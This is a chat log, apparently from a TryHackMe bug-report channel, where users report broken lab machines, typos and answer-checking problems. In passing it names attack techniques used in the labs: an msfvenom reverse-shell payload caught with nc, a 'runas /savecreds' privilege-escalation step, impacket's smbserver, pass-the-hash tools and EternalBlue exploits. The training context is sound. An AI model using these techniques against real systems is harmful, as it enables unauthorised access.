The task also says not even a need to log in to trigger the reverse shell

tough linden
#

oh yeah it does say you don't have to auth

#

let me try again

slate parrot
#

Even with auth it doesn’t work (as user)

tough linden
#

did you try restarting it first?

#

seems it is a little glitchy. I'll add instructions to login as admin after, that should work (did for me)

#

but it's definitely working with auth

#

so no idea what's going on for you

#

what payload are you using?

#

I'm using windows/x64/shell_reverse_tcp

#

and then just nc to catch

wheat fractal
#

quite often it seems it cannot load the pages

obsidian kiln
wheat fractal
#

Sure , im at Task7 where you should load java.uploadvulns.thm , sometimes page loads fast. Sometimes i get connection timeout errors in firefox. Dirbuster also got stuck allready twice will scanning the directory

obsidian kiln
#

That sounds like VPN stuff to me. Can you show me what's in /etc/hosts?

wheat fractal
#

i did add it into /etc/hosts , but i have same issue on another box....... I will reboot my host first πŸ™‚

sonic willow
gleaming jungle
eternal summit
#

It does NOT have a space.

gleaming jungle
#

If I don't put space it didn't accept

#

So it kinda required the space

#

Thats why it drove me crazy

eternal summit
#

It does not have a space.

#

I'm looking at the correct answer right now. There's no space.

gleaming jungle
eternal summit
#

There's no space.

gleaming jungle
#

Maybe its an edge case on my comp. Because I now refreshed the page and you can see the border (now its without the space in the beginning). I am positive that I entered a space and it accepted it only that way, and entered it at least 5 times before with copying and typing. But its probably something on my side

slate parrot
tough linden
#

Which port and what binary are you using?

slate parrot
#

Port 5353 (53 already in use by AttackBox), and using the reverse.EXE binary generated via msfvenom. The same binary has worked in all prior tasks.

#

(That first message was meant to say β€œand using …”, rather than β€œnot using”. Sorry!)

tough linden
ripe magnet
#

In hardeningbasicspart2 the Chapter 3 Quiz is on Task 2 when the tasks to answer it are after (3-9)
In Task 9 there's a typo:

ripe magnet
#

actually the tasks are really mixed up, what should be task 2 is task 14

#

@clear fern just letting you know about this ^
The two hardening rooms were great I took good notes and going to apply it on my VPS

slate parrot
#

Ah just realised you’ve added that in real life this would only work if the administrator signed in. πŸ™‚

slate parrot
latent vessel
#

Hello there I'm facing problem in the room Windows PrivEsc room for the task 11 where there are having this resource to be downloaded in a local machine . As per the task I had downloaded the resource but it was not giving me the required output. They told to install python-crypto module in the task and to run the python script pwdump.py as mentioned in hyperlink. But it showed me the Import error even if I had installed the crypto module while running the script.I had googled for the same but I don't get the required stuff from that. Also the python script is written by using python2 version.
https://github.com/CiscoCXSecurity/creddump7

slate parrot
slate parrot
latent vessel
#

Ok

slate parrot
latent vessel
tiny ginkgo
#

A small typo in Task 6, Room: Linux 3.
For instance let's say you know you have the file name of test1234

oblique hemlock
#

Hardening basics part 2, the order of the tasks is messed up. The quiz is at the top instead of the introduction of the chapter and the content of it: Task 14 for example should be swapped with task 2. Task 5 should also be introduced after task 6.

ripe magnet
obsidian kiln
#

@dusky junco that's been an issue for several months now. You able to add it to your list of messes to mop up, given Nameless has been pinged a bunch of times and acknowledged at least two of them?

slate parrot
#

I am doing the WinPrivEsc room, Task 10 (Saved Creds). I am not sure what the point of running runas /savecreds /user:admin reverse.exe is, if I have to type the admin password? Surely if I know the admin password, there is no need to priv esc? I have already ran the bat file. @tough linden

viral cobalt
#

theres certain circumstances where you don't have to enter the password iirc

final loom
#

Found a couple trivial spelling errors

Room: Network Services (https://tryhackme.com/room/networkservices)
Task: 9 - Enumerating FTP
Section: Resources
Error 1: First sentence "As we're going to be logging in to an FTP server, we're going to need to make sure therre is an ftp client installed on the system."
Error 2: Fourth sentence " If you're bought to a prompt that says: "ftp>" Then you have a working FTP client on your system."
I assume that's supposed to be "brought", and "Then" should be "then"

wheat fractal
#

Battery , Was it patched ?

#

The intended way doesn't work anymore ?

rain thicket
#

does anyone know why flask keeps on dying when hacking on Bookstore?

#

I have terminated my box 3-4 times and I no longer can access the rest API

marble gust
wheat fractal
#

anyone on overpass3 ? i restart 3 times the box and what i try to do doesnt work :/

#

just for know if it is on my side

#

only

hazy tiger
#

How do you know it isn't working

wheat fractal
#

when I try to change user in sudo it takes 3 years to change while I have the mdp

#

so maybe my connection

eternal summit
#

I don't think that's a bug

#

I think that's user error.

wheat fractal
#

ok thanks

#

but anyway really cool box !

left tendon
#

reasking here, though not sure IF a bug. battery's path to root seemed simple

#

maybe a permissions mistake?

#

yeah def a mistake i think - as root i can see content under one of the other users that i skipped past - going to retry and find the proper way to root

tacit loom
#

Not technically a 'bug' per se, but for task ||7|| of the Linux Fundamentals 3 course, I think it might benefit the question to have a different answer. I solved it on accident without actually going through the steps :s

#

I guess you can still go through the task itself to see if you got it the 'right way', but it was unexpected.

brazen comet
#

Hi, I am facing issue while accessing the kali linux browser based machine which says to contact system administrator to add to the allowed users list.Does anyone know why this message appears and whom should I report this to get this issue resolved.I am a subscribed user whose subscription will end on 25 Nov 2021.Any help on getting this issue resolved will be appreciated.Thanks in advance

#

Also I am new to discord which I am using it for the first time so please bear with me if I have posted this same things on multiple hash tag areas

ashen gale
#

Hi, this probably has already been asked, but are these files already supposed to be here? I know the binary is supposed to be found, but wasnt sure if the "next step" should be previously done

Room: linux3

drowsy turret
#

Hi all, not sure if this is a bug per se or just my incompetence but I’m currently working through the room β€˜Further Nmap’ and on Task 14 (practical) question 4 it asks to perform a TCP SYN scan and report the number of ports open but when I put the answer it tells me I am incorrect...not sure how much info to put here as I don’t want to give away spoilers

crude kiln
#

hey can u guys check the new ChocolateFactory
room i can't connect to the ssh

twin tapir
crude kiln
#

yeah i think so

lunar osprey
#

I keep getting this error message when I try to deploy the machine for the Linux Fundamentals Part 1 room. Any ideas on how to fix this? fwiw right before this, it says "Connecting to Guacamole"...

tiny ginkgo
#

Room: linux3, Task: 12. A small correction needed here. We don't technically need the .sh extension after a bash script file at all if we are running it using bash. We put the extension to make ourselves or some text editors understand that its a script file.

eternal summit
tiny ginkgo
tiny ginkgo
#

Oh

tiny ginkgo
eternal summit
#

Look at the cat output.

tiny ginkgo
#

Oh

eternal summit
tiny ginkgo
#

Thanks for the correction. I just verified it. I is only working in bash shell. I am using fish shell so it able to identify the .sh extension

eternal summit
#

zsh might be messing with you.

#

Ah fish

tiny ginkgo
#

Does that mean we don't need the .sh extension at all? πŸ˜… @eternal summit

tiny ginkgo
eternal summit
#

@tiny ginkgo look into port 0

#

It's not 'available'

tiny ginkgo
tiny ginkgo
sonic willow
#

defaults to sh

tiny ginkgo
sonic willow
#

if it's not told what to run it with (the shebang), it will default run with sh

tiny ginkgo
#

So that means there is no role for the .sh extension except for our understanding or for text editors to recognise the file..right?

sonic willow
#

correct

tiny ginkgo
#

We do not need to manually use it

sonic willow
#

to the best of my knowledge anyway, there might be some other reason for it

tiny ginkgo
sonic willow
#

yes the .sh extension isn't needed at all to run the script

iron reef
#

In /psychobreak I can't run the program downloaded from ftp

#

task 4

#

same thing after redownloading it several times, even ghidra can't load it

tough linden
blazing raven
#

Getting an error when trying to use the room machine on the new Core Windows Processes room.

tough linden
#

nah coz the commands are running on the Windows VM

#

like, savecred shouldn't require you to type the password

#

and the password should be in the registry

#

I tested it all before I released it, and I had people write walkthroughs already and they didn't have any issues

slate parrot
tough linden
#

when I get a spare moment I'll just recreate it, doesn't usually take long but I want to test it all again

civic brook
glad badger
#

Try it again. Give it more than 5 minutes to start everything up.

civic brook
glad badger
#

Click Reconnect

civic brook
#

gave me that message

#

goes to waiting for Guacamole to connect then back

glad badger
#

Try Reconnect a few times.

#

Probably needs more than 5 minutes, more like 10 minutes.

civic brook
#

I'm at over 10, still no luck, didn't super need it for the room but I know for some of the newer users its helpful

glad badger
#

I'll have to look at it later, as I'm testing another room.

civic brook
#

thanks

blazing raven
#

I was able to complete Core Windows Processes room without the VM. @civic brook

glad badger
#

I'm looking into the VM attached right now.

glad badger
#

Core Windows Processes VM works now. @civic brook @blazing raven @lethal tulip

civic brook
#

thanks tim

main iris
#

i think the room battery has a bug,because finally i get the root acess read the user flag and the root flag,so it's right?

grim yoke
#

nope the VM has no bug , whatever you see is intentionally there, there are different ways to get root πŸ™‚

glacial yarrow
iron reef
#

try writing http instead of https in the url

plush urchin
#

hey there, is there anything you guys could do to increase the uptime of the machine in windows privesc room?
i mean.. it says i have 2 hours but at the end of the first hour it just shuts down and i have to terminate and deploy it again for it to work properly, making me run every single command to get that reverse.exe in there all over again.
thanks πŸ˜‰

sonic willow
#

not sure if that still applies but ^

plush urchin
muted pivot
hazy tiger
#

This has been reported ^

muted pivot
#

Ah that's great, may I know if it's possible to follow the update or get notified when it's fixed?

wheat fractal
#

Core Windows Processes: cant login the VM windows

#

already restarted 2x, no effect. still connexion error. Thanks

hazy tiger
#

Screenshot

wheat fractal
spiral eagle
#

@fading plume There might be a dilemma with Question #2

fading plume
spiral eagle
#

User hash is different from the other day. Answer is still the same

#

Sanity checked and someone else who completed the room did as well

fading plume
spiral eagle
#

Yes Sir.

fading plume
#

do you mind if i DM? the room is still new so can't talk about the approach here

spiral eagle
#

Of course

wheat fractal
vocal iron
#

I think Advice n.4 (Crack The Hash Level 2) should be reformulated. I was able to bypass the answer easily. Using "D.... G........", .. = letters. Perhaps tolerance is the problem.

final junco
#

Guys what happened to the checkmark that tells you you've already finished this room in a learning path?

obsidian kiln
pliant flax
#

Anyone else happen to go through the juce shop room and getting incorrect and/or no flags at all from the dom/persistent/reflective xss challenges?

#

doesn't seem to be a burp issue as the room overview suggests

pliant flax
ripe magnet
visual roost
#

Does anyone know why all of the rooms in the beginners path are shown as not complete? I have done most of them. When I click on them it also says I'm done. Is this a bug anyone is familiar with?

#

The rooms show up as complete in the "My Rooms" tab on my Profile

ripe magnet
visual roost
blazing raven
#

John The Ripper: Task 12 appears to be out of order.

glad badger
#

The out of order tasks in John the Ripper have been noted. Thank you for reporting.

wheat fractal
#

In the Windows PrivEsc room Task2, just a heads up, that "sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali ." wasn't finding the smbserver.py, so I had to locate it and change the path.
Edited to say that it was the path to the smbserver.py file on the browser based kali machine that seemed wrong. I wasn't in my own VM or anything.

wheat fractal
#

Also, in Task 12 of Windows PrivEsc:
pth-exe command cannot be found in the kali terminal in the browser attackbox, and I can't seem to sudo apt install it

atomic cloak
#

On room networkservices -> Enumarating FTP -> Question 1: I think that expected answer is wrong

atomic cloak
#

and on the networkservices2 room, there is a link to zthlinux room which is private

proper jasper
#

same with task 2

eternal summit
latent vessel
#

There is a problem in connecting to SSH in Day 20 Task 25 in Advent Of Cyber 2 room.

#

While connecting via SSH it connects but the password is incorrect showing Permission denied,try again error.

#

Password is typed correctly as mentioned in the task but still shows the error

hazy tiger
#

Hey @dusky junco Hope you are well.
As covered by Bornunique911 above, the password does not work for Day 20 in AOC 2.
I have tried to login on the free attackbox as specified in the task but it does not seem to work.

Could you check it out?

jade plinth
#

same problem as @hazy tiger and @latent vessel

obsidian kiln
#

As shown in that error message -- someone forgot to set it to never expire

#

Easy fix

fallen pine
obsidian kiln
fallen pine
#

oh yeah

#

thanks

dusk wedge
eternal summit
dusk wedge
#

oh sorry i just now read the -h menu

dusky junco
glacial tree
atomic briar
sand snow
#

I was playing advent of cyber 2019 ..... in the reverse engineering challenge the binary doesn't match the questions they provided

#

I think tryhackme changed the binary but not the questions as it give me incorrect answers on the values of some variables....

#

the answers were taking the older answers not from the binary they provided but the one they used in 2019

midnight hollow
#

I solved it a day ago and I had no problems

#

πŸ™‚

#

Sorry the emoji was going wrong πŸ˜‚

sand snow
#

In the task26 i didn't find the imull instruction in my binaryblobhuh

#

is this only happening to meπŸ˜‚πŸ˜‚

#

the values are different i checked a writeup but the binary they provided they have different value for that particular variable

midnight hollow
sand snow
random viper
#

I’m following as it is in the β€˜β€™windows privesc task 3 β€˜β€™ I’m getting errors in both power shell and reverse shell
Even in task4 getting errors
I have checked write ups and videos whether I’m doing it wrong but there are doing it the same way as I am (but I’m getting errors) , unable to continue like this

gleaming shadow
#

in the Sysmon Room, Task 4 there seems to be some confusion between ports 444 and 4444

twin tapir
#

not really a confusion configuration files are just wack

gleaming shadow
#

still seems odd, but ok

twin tapir
#

I know configuration files are wack

mortal tinsel
#

Hey guys. I keep losing the reverse shell on the Mr Robot box everytime I try to run an enumeration script. Does anyone have an idea of what might be happening?

gray mulch
#

This has probably been already said but i have clicked into this as it says 100% but not marked as a tick here

gray mulch
#

Ok. Thank you πŸ‘

livid rune
#

ok i found the answer in a writeup but still a bug

eternal summit
#

This is not a bug

#

This is user error.

green ermine
gritty dome
#

does coldbox work on windows I couldn't get the ||reverse shell working||

eternal summit
#

Check your firewall.

gritty dome
#

that didn't work

#

pentest monkey says this ||Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows||

#

but I don't know how to fix it

tall pivot
#

I do exactly what needs to be done and it does not work.

fallen pine
hazy tiger
# tall pivot

You're probably doing something wrong, screenshot your options please

tall pivot
hazy tiger
#

If you mess up too many times, the box stops working.

obsidian kiln
#

I've also found the MSF version of EB to be a lot less stable than the manual version, interestingly

#

AutoBlue has quite literally never failed me yet

fallen pine
#

but once it passes

#

it gets direct nt authority

#

no need to migrate

#

or privesc

hazy tiger
#

Takes me ~1 try :)

fallen pine
#

πŸ‘€

obsidian kiln
#

Of course it gets system every time... SMB runs under the localsystem account -- who else is if gonna give you a shell as? kekw

fallen pine
#

@obsidian kiln no i meant that in the room there is a separate section for privesc

obsidian kiln
#

Oh, it's poorly labelled -- it's referring to turning a standard reverse shell into a meterpreter shell.

#

Which also isn't necessary when using the MSF defaults these days.

fallen pine
#

yeah

fallen pine
#

but also there is also a step written to migrate to a process but every process migration shows access denied and meterpreter becomes unresponsive after some time

#

@obsidian kiln any idea what i maybe doing wrong i completed that room after trying a lot of times due to short lived meterpreter access and not able to migrate to a process with nt authority

obsidian kiln
#

No idea without looking at it directly

#

I would be trying an automigrate myself

severe coyote
#

|| rant: tried not seeing the example image as mentioned in the task and then msf started yelling at me for not setting the correct option||

sonic wave
#

Don't know if this was already reported but room "break it" is broken since pastebin link is no longer working

obsidian kiln
#

@heavy spade that's been dead for a while and DesKel isn't around to fix it. Assuming we don't know what the text is meant to be, can I just pull it?

hazy tiger
#

You can find it on the way back machine

#

There’s a link to the writeup somewhere in this chat

#

I think I have it written down one second

obsidian kiln
#

Perfect. I'll use that to dump it straight into the task

hazy tiger
obsidian kiln
#

Oh, a web archive of DesKel's writeup

hazy tiger
#

Mhm he luckily stored some of them, not sure about them all although

heavy spade
obsidian kiln
#

I found the original text

#

But I'm not sure how beneficial this room really is tbh

#

I, uh, also see why he had them in pastebins

#

Look at that scroll bar on the bottom kekw

hazy tiger
#

I should have mentioned kekw

#

Too much effort to place them in a zip file and attach them to the room?

civic brook
obsidian kiln
#

The strings are now directly in the room

fallen pine
#

lol πŸ˜‚ the scroll bar is almost infinite

fallen pine
#

why there are two rooms with same name and description? contents are different though

twin tapir
#

Because there are two different rooms

distant glen
#

Another issue with one of the machines I've encountered is in the Network services room
when searching for the profiles share, nothing is found
also tried using a script for anonymous logins and none found

timid wave
spice kiln
#

In the Sysinternals room are you only supposed to interact with the vm via the browser?
No creds are given for RDP

glad badger
spice kiln
#

My in browser window wont work

#

Ive terminated and brought it back up a couple times, just a white square 😦

glad badger
#

Show a screenshot. It works on my end for the Sysinternals room.

spice kiln
glad badger
#

Do you have an adblocker plugin in the browser, like uBlock Origin?

spice kiln
#

No, thats what I checked first

glad badger
#

Firefox?

spice kiln
#

Im using chrome rn I can try ff

spice kiln
glad badger
#

And refresh page?

spice kiln
#

uh f5 terminiated the instance lol

glad badger
#

Are you a subscriber?

spice kiln
#

ye

glad badger
#

Not sure what is happening. I don't have access to the backend. Let me check with someone who does.

spice kiln
#

I will say I have a couple thm rooms open in tabs but i think I dont have any boxes up rn

glad badger
#

Try closing the unused tabs and refresh the page.

spice kiln
#

Is there a way to see what boxes you have deployed? Cuz you can oly have 3 up at once right? And I hop around A Lot

spice kiln
glad badger
#

Okay, I've forwarded the issue.

spice kiln
#

Grazi

glad badger
spice kiln
#

yeah but I thought maybe it just wasnt displaying the error since i havent been in any other rooms that you use browser access for the box and maybe its a kinda unique scenario

spice kiln
glad badger
#

I only deploy one room at a time for that reason. On the backend they'll be able to see that easily.

spice kiln
#

you think I could query the pub api to see deployed boxes under my acct?

#

I made a script to pull back points and rank from public username for my team last week

eternal summit
topaz thorn
spice kiln
#

Windows Event Logs Room Task 2 Question 2:
For the questions below, use Event Viewer to analyze Microsoft-Windows-PowerShell/Operational log.
What are the total number of events?

#

But 482 is not the flag... Similar issue with the next couple questions

prime walrus
#

Golden eye room. This is the second room were I found an issue with the right answer being wrong. Some qc would be appreciated on box submissions please . See attached .

#

How I to finish the room like this

eternal summit
#

There are 10 possible values, with 2 being outside that list as they're 0 or you've tried them

light reef
#

hi, ran into a bug with Metasploit room. when following the instruction to background out under latest msf 6 and then search server/socks4a, no results are found. only when searching socks do i get a result, and the result does not match the room's expected answer to the question, unfortunately.

#

Furthermore, the final question (at least in my opinion) does not really have enough context or instruction to be answerable, at least from my perspective.not sure if anyone might be able to provide someinsight on how to go about figuring this last portion out?

eternal summit
#

The final question is research

#

Look into the tool it discusses

light reef
#

ah. okay. there is no indicator for it as a research question. thanks

eternal summit
#

Preferably don't show answers

light reef
#

my apologies!

#

ah. final question is kind of weirdly worded for what turned out to be kind of an obvious/easy answer lol. i guess thats not a bug though. but maybe should have the [Research] tag in front of it? Anyway. thanks for your help

fierce girder
tiny ginkgo
#

Room: owasptop10
Link: https://tryhackme.com/room/owasptop10
Task: 18
Bug: The authentication in the login page is broken. No session cookie is being set and I can visit the machine_ip/note.php even without logging in.

eternal summit
#

Do you have a room bug to report?

green ermine
green ermine
eternal summit
green ermine
#

in

green ermine
eternal summit
green ermine
#

but the bug contains answer what should i do

topaz thorn
green ermine
topaz thorn
#

refresh your page it will be fixed iirc if your answer is like 95% correct or something it will accept it

#

It's just the answering system that THM uses

green ermine
#

be

eternal summit
#

We could 100% do with a "No answer tolerance on this question" checkbox for creators

eternal summit
green ermine
wheat fractal
#

attacktivedirectory task 7, line 2, the hash is right, but the site is saying, your answer is not correct

obsidian kiln
wheat fractal
#

i do'ed the new password

#

i know what u saying abount

viral cobalt
#

send what you're submitting like so:
||password||

wheat fractal
#

Hello All

#

I'm doing the The Elf Strikes Back challenge, however i cannot submit the file to the server on the file upload

#

it simply does not confirm that file is upload successfully. Is anyone aware of this issue?

wheat fractal
#

resolved

uneven laurel
#

Hey, while doing the bufferoverflowprep room task2, i found the list of badchars(which is correct because i got my reverse shell) but when i enter thkse chars and hit submit it says wrong answer :/

#

Is this just me or ...

obsidian kiln
uneven laurel
#

Will do, πŸ‘

edgy kindle
#

hey all

hazy tiger
#

??

tiny ginkgo
#

@dusky junco I found another broken authentication in owasptop10 room, task 25. This one's kinda funny 😜 I can sign-up for the webapp without even providing any username or password and it logs me inπŸ˜… There is a required attribute set in the input fields but it doesn't work because of the onclick="submit()" event set on the signup button. So the submit() function is called as soon as I click the signup button and sets a session cookie which is required to login, regardless of what I put in the input fields

dapper rose
hazy tiger
#

Not sure what the questions entail but none of the rooms should have internet connection?

eternal summit
#

This has come up over and over, and I believe that it's been marked as "you really don't need one"

trail bramble
fallen pine
#

πŸ‘€

#

lol

gleaming shadow
#

For the Blaster room, is it normal that Internet Explorer has no browser history to speak of?

eternal summit
#

It's a known bug yep

gleaming shadow
#

Ok

eternal summit
#

I can give you the information that you'd get there if you want?

gleaming shadow
#

I remember doing retro and the history was on Firefox, though my progress seems to have been reset

#

Or maybe it wasn't retro

#

I found it by looking up the binary

dusky junco
#

Wait

#

I thought I fixed that

tiny ginkgo
fallen pine
#

There is a bug in sysinternals room I used the strings command which shows me this path but when i enter this as the answer it says invalid path

lime yarrow
#

seems like there might be a bug with the sql injection room https://tryhackme.com/room/sqlilab - in task 3 / question 5 the flag is supposed to be located in another table (according to the text), but after gaining access to Admin there still arent any other tables than the usertable (I also did check sqlite_temp_master as well

tiny ginkgo
#

Room: Owaspjuiceshop
Link: https://tryhackme.com/room/owaspjuiceshop
Task: 5
Bug: After downloading the acquisitions.md file (it cannot be downloaded as clicking on it just opens it. So I used wget to download it), it is said to navigate to the homepage to receive the flag but it does not show up.

lime yarrow
tiny ginkgo
lime yarrow
#

see task8

arctic bison
#

jabba

hazy tiger
#

Hm?

tiny ginkgo
lime yarrow
#

click the "solved" button next to the right question and you will get the flag

lime yarrow
#

seems like there might be a bug in the new linuxAgency room for mission25. I have the flag, room page accepted the flag but it wont work as password for next user

#

ok so problem is with the THM room page accepting broken results

eternal summit
#

Answer tolerance

#

Refresh and it will show the correct answer

lime yarrow
#

ok

wheat fractal
#

Issue on The Elf Strikes Back! is not yet solved - file cannot be uploaded to the server

#

anyone has the same issue?

obsidian kiln
wheat fractal
obsidian kiln
#

The developer console

wheat fractal
#

Uncaught (in promise) TypeError: NetworkError when attempting to fetch resource.

obsidian kiln
#

Could you show me the network tab?

obsidian kiln
#

Try uploading something with the tab open and show me the request?

wheat fractal
#

ok

wheat fractal
#

when i press submit, it just doesnt move

obsidian kiln
#

When you press submit nothing shows up in the network tab?

obsidian kiln
#

The JS used there is very common -- it's not new or anything, but a very old browser could break it. Not sure what's going on there for you

wheat fractal
obsidian kiln
#

Yeah, that's something at your end I'm afraid. 4xx errors are client side

wheat fractal
obsidian kiln
#

That often messes things up yes

wheat fractal
#

ok let me switch it off then

obsidian kiln
#

Is your THM VPN running on your host or Kali?

wheat fractal
#

Kali

obsidian kiln
#

Good

wheat fractal
#

would you have an idea why>